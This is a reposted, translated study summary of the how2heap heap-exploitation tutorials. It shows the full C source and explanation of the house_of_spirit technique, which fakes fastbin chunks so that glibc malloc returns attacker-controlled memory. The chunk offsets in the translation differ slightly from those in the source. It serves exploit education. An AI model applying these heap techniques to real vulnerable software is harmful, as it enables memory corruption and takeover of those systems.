how2heap vulnerability technique research and analysis summary (part 2) - Vulnerability Alerts - 黑吧安全网 (myhack58)

ID MYHACK58:62201789203
Type myhack58
Reporter Anonymous (佚名)
Modified 2017-09-11T00:00:00


"how2heap" is the shellphish team's open-source heap exploitation tutorial series on GitHub. Over this period I have been continuously reviewing the common techniques for exploiting heap flaws, and I feel that learning these applied skills will pay off later. This article is my summary after working through the tutorial series, shared here with everyone. I have only translated the content of the original tutorials, to make it easier for classmates whose English is not so good to review them. Before studying these techniques, I recommend that everyone first read Hua Ting's "Glibc memory management - Ptmalloc2 source code analysis". Here is the link to the original tutorials: (to be added). The summary of the first part (上) was sent through the WeChat public account, so it is not posted here; go to my blog to see it. Blog: reversing.win

The translation part is my analysis plus my own understanding; every sentence is only what I myself understood. Where the original has mistakes or unclear wording, I have corrected it in the translation, so if the original is not clear enough, see my translation. I have not posted the output part; anyone who wants to study it should look at the output on their own machine. :P

0x01 Test environment

Ubuntu 16.04.3 LTS x64, GLIBC 2.23

0x02 Contents

house_of_spirit
poison_null_byte
house_of_lore
overlapping_chunks
overlapping_chunks_2
house_of_force
unsorted_bin_attack

0x03 house_of_spirit

Source:



#include <stdio.h>
#include <stdlib.h>

int main()
{
	printf("This file demonstrates the house of spirit attack.\n");

	printf("Calling malloc() once so that it sets up its memory.\n");
	malloc(1);

	printf("We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
	unsigned long long *a;
	// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
	unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

	printf("This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);

	printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). "
	       "The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
	printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. "
	       "E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end.\n");
	fake_chunks[1] = 0x40; // this is the size

	printf("The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) "
	       "to pass the nextsize integrity checks. No need for fastbin size.\n");
	// fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
	fake_chunks[9] = 0x1234; // nextsize

	printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
	printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
	a = &fake_chunks[2];

	printf("Freeing the overwritten pointer.\n");
	free(a);

	printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
	printf("malloc(0x30): %p\n", malloc(0x30));
}

Translation:

This program demonstrates the attack technique called house_of_spirit. First malloc is called once to initialize the heap structures. We will then tamper with a pointer so that it points to a fake fastbin region.

	unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

This region is 0x50 bytes long and contains two chunks. The first chunk starts at fake_chunks[0] and the second at fake_chunks[8].

(Figure)

The size of the first chunk must fall within the fastbin range (at most 128 = 0x80 bytes on an x64 machine). Because this chunk is the one we pass off as a fastbin chunk, PREV_INUSE does not matter: free does not check this flag for fastbin-sized chunks. The IS_MMAPPED and NON_MAIN_ARENA flags, however, do matter, so make sure both are 0.

Note also that when we request memory with malloc, the size argument is rounded up for alignment, so different arguments can all give us the same chunk size: on an x64 machine, requests of 0x30 to 0x38 bytes all end up as a 0x40-byte chunk. So if we want a 0x40-byte chunk, any value in that range can be used as the malloc argument.

In addition, the size of the second fake chunk must be greater than 2*SIZE_SZ (16 bytes on x64) and less than the arena's system_mem (usually 128 KB for the main arena), so that the fake chunk passes the next-chunk size sanity check. Then we set the pointer that is about to be freed to the fake chunk's location, fake_chunks[2]
